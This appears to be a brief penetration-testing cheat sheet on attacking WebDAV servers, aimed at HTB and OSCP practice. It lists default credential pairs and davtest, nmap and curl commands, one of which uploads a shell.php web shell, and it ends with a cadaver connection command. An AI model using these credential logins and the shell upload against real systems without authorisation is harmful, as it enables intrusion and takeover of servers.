Skip to content


Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. It was originally started in 1996, when this didn’t seem like a terrible idea. I don’t see that often on recent HTB machines, but I did come across it in PWK/OSCP.

user pass
wampp wampp
jigsaw jigsaw


davtest -url http://$IP/webdav/
davtest -url http://$IP/ -auth "$USER:$PASS"


sudo nmap --script http-iis-webdav-vuln -p80 $IP/webdav/ 

GET request

curl "http://$IP/webdav/" --user "wampp:wampp"
curl "http://$IP/webdav/" --user "jigsaw:jigsaw"
curl "http://$IP/webdav/" --user "$USER:$PASS"

PUT request

curl -T  "proof.txt" "http://$IP/"
curl -T  "proof.txt" "http://$IP/" --user "$USER:$PASS"
curl -T  "shell.php" "http://$IP/webdav/" --user "administrant:sleepless"

Conect ftp-like

cadaver http://$IP/webdav